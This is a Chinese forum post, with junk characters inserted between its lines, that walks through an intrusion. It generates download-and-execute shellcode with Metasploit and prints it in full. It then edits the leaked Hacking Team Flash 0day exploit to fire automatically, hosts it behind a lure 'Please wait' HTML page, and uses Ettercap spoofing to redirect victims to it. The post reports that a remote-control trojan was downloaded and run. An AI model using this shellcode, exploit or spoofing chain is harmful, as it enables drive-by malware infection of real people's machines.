|
$ o4 T; x: T1 H: x7 R: G5 U
三、flash 0day之手工代码修改制作下载者实例入侵演示 7 `' u. R2 {5 w) c
X m3 e' h* F8 h7 {7 e* f, ?. D
* W T. \3 t: y$ {( x 利用到的工具: , A! s5 q& V ?7 _+ E" K
+ V/ [9 s: e" Z3 U% ~
3 Y {: ?5 L6 Y2 ], K Msf # {- Q1 M+ ]. m# E* s) C
# r3 O) _7 O3 V
! d5 _7 O( d, V" B" g! V8 { Ettercap
) Q4 ] e' c$ U7 K $ r. b j1 o! Y1 F; S
' r9 z# K( a' M% J s Adobe Flash CS6 6 C) }7 C* ^. C d+ U" r, I8 g; P
$ i8 X. @/ ^5 t5 ~- Q! ^
/ f' y3 |* F* V% Z8 P- Q Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 & p5 I7 ^- P, s& v$ e
7 d$ e+ u; F. G5 W: E- b0 X2 P* h9 Y; b' A6 [
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options 0 c* o7 U) T# d0 F' ?2 u5 u
/ z/ I; G- o4 m" x) j
1 k$ }7 Z1 D$ A# y6 l 如图:
- A- G( N. V) S& I: N L ( Z; D }2 O$ s# J4 |
: u: a; e2 j( R9 i $ L8 |* L! ?, q$ v0 N
( |/ u- p9 e& ?# n: @. Y+ C# x! z
' s6 L/ k6 E" z( Z  4 p; o i( W) s7 W
: |& ^; Y! e/ f% d
4 b( J7 g' y- H 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图:
( D0 M7 R! }. U$ K% p0 B % ^% O+ ~6 }8 x
$ ]( {" s& n, _
6 h8 R) A* p0 O; g0 b4 f
# ^4 g1 q" ~( n- i9 C
" j& K- G. w# O) S
, k% p9 U1 B8 B' H. u' q0 Y* V1 W
3 s ~3 L- i7 k' v* k9 {5 s
0 R1 a5 E4 C d5 o/ |' L 然后执行generate -t dword生成shellcode,如下:
! a0 l7 Y/ ^9 k z W) X) [6 E) u+ A , h- B D! ]9 C5 P3 J2 u4 F
# m8 i! V* C- e2 P0 J; a+ J. q. W  ; p) p$ q1 e6 A3 a
; Q) y6 k; S P9 {6 t' r. v
5 b. ^0 O/ @% F8 H
复制代码到文本下便于我们一会编辑flash exp,如下: % r7 I' j# n0 N5 D9 h
( h; D; _, l9 `. W& A$ C1 z$ n5 w* N& _4 s7 j2 k
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
3 v9 V/ I1 E$ l( e
) P! e3 S% v q3 l) ^! x+ R
& ^' o) L& ?+ _ 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
4 o6 \) I7 k) g! l7 U) V: }
. N% S i0 `! F! c
3 A5 b) O, I' x9 D$ z& A; f 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, : ? Z- Y; H2 p6 r: Z
9 f5 G8 K- \- g# U( e1 J, p) z
& r) c# V1 o" z, E$ r/ p 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
5 C# o9 E" g7 t" ^' g
3 G$ b p( I. n% F# z, q) o! K" E7 D7 K
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, 6 }& n. e0 U# G7 l- ^% c) A
) q: z8 q- k6 K T# a/ W* _
( ]% P* n$ L5 Q$ V/ |9 g) ~ 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
- n( N9 d( [+ h! p7 b' N & H1 U. h0 n& R6 R! y) W% x8 Q8 X/ I
0 b$ F. S0 c# i. s. [4 H: { 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, . [( v3 R0 G8 ^ E
* Y# f' z9 x( m! B1 p! J+ a& ~. o4 |9 A8 Q8 j
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, + ]; _. g" O8 S) ?* p, `
! }( \- Y- `! m, }$ @3 N$ k9 z( ~+ y- @
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 9 I* x6 c, c, J; d1 l9 S. z
" k L% @. B9 U5 K! z# {, j9 u* r
# w; T7 W6 q7 K. I' D 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, ( v9 V. V- V, ?1 B% L g
7 }* E/ @6 e& j9 r& K3 y2 `
; p: _/ ]# S+ |8 }7 E( w& F 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
- L( f4 C! W. s
! B, C+ G: ?8 k! K$ F t3 y" [* }% q( j0 Y6 H* Y
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
! m% H9 q" B9 ]. `' M % a$ s8 h' A) n* {. x0 B! m
7 @% Y' c/ l5 d8 |/ X 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, + y, T& k! M" \
2 f5 s$ E @& n, T
5 {% j+ d( x1 B; e( R; q% L
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 ! V" ~: ]( @7 V/ q1 J
7 I: D! r! J& ]0 p! ?8 ]2 a+ l& t
5 v7 m: I; k6 Z; \; ]
: B: h6 q* O% F0 i) {5 s. C
% {6 k5 g8 j- P* p. q8 i
1 X' r# @5 N0 J1 d7 g7 j
% F- `1 n6 \4 a2 x A3 A O
3 B8 s1 S0 \/ g @ x+ i
% \8 z3 t! S4 s4 P 下面我们来修改flash 0day exp,需要修改三个文件,分别为: , E( ?# C; H0 v0 E! t/ \# t5 _, G. `
5 u3 M7 H3 W4 |) E( k B
, G* i) H+ p# }( x) [+ P
" F1 {. V& z% h6 r8 X# R1 a 7 ~, f. V- q0 t
" c) u" }5 p$ K4 M/ b0 b2 I" z 先修改ShellWin32.as,部分源代码如图:
* X/ y* T) z) L
. \" h( Q# ?, l. j
4 z7 j5 @& u& {; a1 w; e' T6 h/ B  ' x3 ]9 w" z3 ^8 Z8 b& _4 n( f
# {1 {- K& W; F# z; }6 A5 v
# F( k7 v' t! Q 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
. _- } [+ z, A; F $ ]# P: e) |' R& [/ e
: s/ X: ?( B9 |
# O" T) ^& x8 l: f) r% x& u
7 Y( N) o" V% d: x0 e
; ]: V4 |* ~5 c5 ]4 ~ ~ 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
! X M! V: l' ]! }5 ^
. \/ x1 i' z# x: Z+ X* R! A/ I9 Q% }9 A O& \* O3 ~
\2 c$ X9 L8 J+ r, H % |; t' h1 R5 y" f% G/ _
0 E9 P/ w3 U# f4 ~( P5 ~6 @
换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
( R) p. h! Z" n) Z
* O, A8 y0 k9 v) I
/ z6 Z& Z: |( w/ ?" \
/ d( P, ?4 F+ | 1 U1 a& z: ^2 V, [
5 x0 A% ~* X! E5 J & U2 w# s0 m9 I. z6 S7 ]+ e
$ I3 c' L; V! r5 p( w
j$ w8 S- u5 t+ O 
6 D) ^1 n. Z8 V* p; v # F) b9 D' g- o% ^: B) y+ j
D( n9 X" z! m8 l# i! S& z
然后点保存,下面我们来编译一下,打开
: ?! [5 W- z4 k, _: h+ E2 h
/ z. h; ]- Z" M9 T1 V D
$ \( M2 @/ `$ Q7 ] exp1.fla然后点文件-发布,看看编译没错误
0 x/ R1 w2 c4 `; z 7 m5 `9 O) n6 W: i; E
) d- B! `; L" r
% h) Z4 O, i: h5 ~- P , V1 F0 @: z& [) x- k2 v
! Y; O e" {- q0 L3 w$ d- X
- J; y% ~& q% m5 p4 N7 w, P$ u. @
/ A# J4 k- u5 X
/ V0 R2 S: F! b3 D . V$ N5 `4 K7 B4 l& k
" e) y: Y. J5 [: J: Y6 G, Y
6 |" y( t7 X# Z- q  ) C$ R y# h9 A/ k, S
_! W: ^1 f% w% [$ J2 j$ s+ W9 c& D, w7 V5 ?0 g. k6 o- A- g( E
然后我们把生成的
! N, c6 ^& }3 m( S0 n" v
4 P2 \0 s5 a2 M
P3 l; l [; ~, T% M) M exp1.swf丢到kailinux 的/var/www/html下: * Z: _- F( ]: V4 m
# I% I. b4 a4 |$ X2 C4 B U( q
1 g6 t# s" T/ E8 d, ?9 q 然后把这段代码好好编辑一下 1 T: @, i, S2 ?6 q" K; J" X' o
3 ^/ }7 X4 d2 D" v
" u4 O: f- Z& C 1 `' P# X) i* Z& m+ s) ?$ r. U
9 [8 H8 S+ U% k+ X$ R* |6 N8 _
4 s6 {' U. H6 H7 b( N * x- \$ G. u$ ^4 @
; U. c+ d+ H z9 D# o8 s
- v. P/ n0 ~- t/ H" D/ K& O
1 G, Y' h6 x4 l% w# `& J c3 v - p) ^7 E" e& ]) Y% P
4 N; ?$ g+ Q0 I8 C$ R* y
3 M, [# A: G8 {" r( ?
7 c3 ?0 i+ M- j1 n7 x/ I3 s6 X8 _. C! L( N. ?9 U1 w4 t0 I
* L, X- ?1 `: L+ c! B! ~
1 ?/ x( O9 |% Z2 j8 Z y) D6 \- Z; t
( T% L7 t/ G$ _* K, I% w( |/ w
* P4 G3 e; ^8 B8 Y8 O
, L5 k% L% _5 ~; |6 d3 T* b' q h9 y, u
<!DOCTYPE html>
8 l: T* K$ _, Z3 Z( ]- g / X; s1 J1 x% m: y" o
" x s: M; ]; h, F$ \
<html>
6 d7 A; G$ }- P7 q& S5 ?
6 W6 q# Z4 k& P" C9 t' }2 T
" A+ R6 {/ i& q- u4 ~ <head> / K5 V% N3 h" R" T) ?& t$ Q
5 d6 O" o& G7 g% m- M/ E6 c7 \; d& f/ ]( X [! I
<meta http-equiv="Content-Type" content="text/html; % A; o- ]' C0 o& |
% t% C$ { a$ |2 P% ^) U* L* r, T, C& {
: ?* H' }/ M/ \, l$ V+ H; u- O charset=utf-8"/>
1 w+ z4 Q& `$ X6 o ) Z- J) U: q# \
% Z$ k/ I3 M" f9 q% x. N
</head> & C" `3 q Y/ h, U
6 A+ N/ `2 n+ Q0 n Z4 @6 Z7 u
3 u" t/ P5 I. i0 ` <body> 1 }+ X- \) k+ Q7 b# g ]* D
/ C' j1 W0 H* Z+ _" V& J
( O" g" `$ j0 S0 a, C# I% u <h2> Please wait, the requested page is loading...</h2>
! {( Z4 g% v2 Q3 a" G6 ^ Y; c
" r2 L) s1 C! H! C
' j; s& v9 F B <br>
4 `9 W; _- d+ z& n8 r
, p( i% [, m, y8 w6 _) V) z4 N
0 e- M5 }. h6 w+ F <OBJECT
) \. P) Q) n' M
) ?2 P: F5 x( \% t0 a1 \! z/ x9 E+ P$ b1 \
classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie
! `; N. n4 @# x& Y6 F0 g & s0 K) n: _8 k8 d( x
0 @! U ]" \" Q5 w: q# r9 I
VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
. [( `( [- C; A4 n$ y3 q( j 1 U" L" U' x( a+ `" J! t
0 t+ U, ~1 ?# @" K7 U8 P1 Z) J( K4 D( D
</body>
9 ^, b# T6 i( k
: `- N' F* e2 d' v( I+ e0 s
4 |) }8 s6 N. | <script>
k* p+ j5 {6 F6 j) s$ u7 X
9 U8 g8 N" H0 d: D* z X5 u- d1 ?" M4 b! N5 y
setTimeout(function () { - }' @6 j W3 k* w+ n4 L/ L& }; z
( M- @9 N% c! r9 X: P ?: y
; N: N3 x+ b/ i4 r4 ~% S
3 Z0 u5 e6 K& _. c" r. q
2 g# h/ N5 a- `8 h. P/ F0 W4 `, Q
0 e W" r; U; J& {9 \+ C window.location.reload(); % D: C: y1 Z* b6 O! L2 S
0 R2 }) [( H/ H" m8 q! H6 m" d9 C. X0 g4 P
}, 10000);
7 J' H& _* @8 {" K6 L) X , x, u' e1 D* I
V( D8 o* o; r" p0 A: }$ p
" U% n' i4 k0 F& z7 K
0 o0 z) o$ k: R- J2 Q* x, J6 I6 d4 f& u( n7 K0 R
</script>
: H, C- Z y: l8 r6 f* v - r2 e4 r" a+ ?1 k
! ~( z( ~! }( e </html> , D! H, s! f4 e9 ]# ?- P
2 ~; h! {) T( q4 t/ V( P1 L, Z$ R0 u# b# m7 Q& F% T- |0 |: p6 v
( w) P6 ?4 G/ ~% W' X
0 p7 o: J( q" @6 H) P
/ c; `, v' e1 S7 r( D, [' } 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
: C' G6 h, d( _4 v1 A ; m1 g* A7 W; m4 v
W6 j) T9 W8 }, b' {7 G8 r2 L
/ {3 y I3 z# b0 k9 m( E! P6 E 9 H/ K6 p/ \! o* f# Q
- h5 e6 n+ j3 N& Q
# r% b: }2 J5 r: A3 a8 k% b' R & y$ p/ x% P6 y. O1 y1 V5 z. s5 d6 u
* [' \) i7 Z, B; Q) X$ x, z
- D7 @* |* z. P! O ?
( r! f9 x# U1 G
! {, R8 t7 G% a2 @" ` & u$ W' a4 P% h& V
& z2 _; | i& v# t8 m# \+ a
# \* i+ G: j5 f* ^, ?; ?
8 q3 S5 [, Q& K! e
5 v% N. F) K9 B6 t3 U$ M1 D! z8 T. B" ^9 [) N
下面我们用ettercap欺骗如图: - R8 |# h) ]' b- R# U2 C
l7 R& S1 m1 v* r
1 ~* ~8 v# }- K- o5 q" b  * z) r' \# B7 z! i' ?
0 C/ D9 e+ L2 }" F
# W1 B1 n: |3 S: O, g% _7 p
. c$ A4 S }5 j- c% Y+ Y- } " A, e# q8 Y) x
4 t4 H# z2 Q5 Z) t4 _; u
下面我们随便访问个网站看看: 8 c# ]0 o3 G0 t3 k" @
{7 n( V. _/ b3 p2 l( A% o+ N% Y. v! O3 F" v$ B: H8 B: O! k
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: * u$ v7 X' B& P* T' u+ ]' o4 a
( w! M3 n( p& d8 U$ g
; z# W3 m. h. j% U$ m1 b3 \% j  * N! b+ f0 e" R1 G f
- c2 E6 Q+ g7 V0 B
! ^& q. s/ e7 H8 b6 E+ U 我们看另一台,
5 h5 j% I! s0 B) \
2 r# a( [3 s( L( [. ?9 S$ b1 q1 t6 R/ p+ M4 K
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。
1 ^4 {1 A9 K# ` | 
发表于 2018-10-20 20:28:55
收藏
支持
反对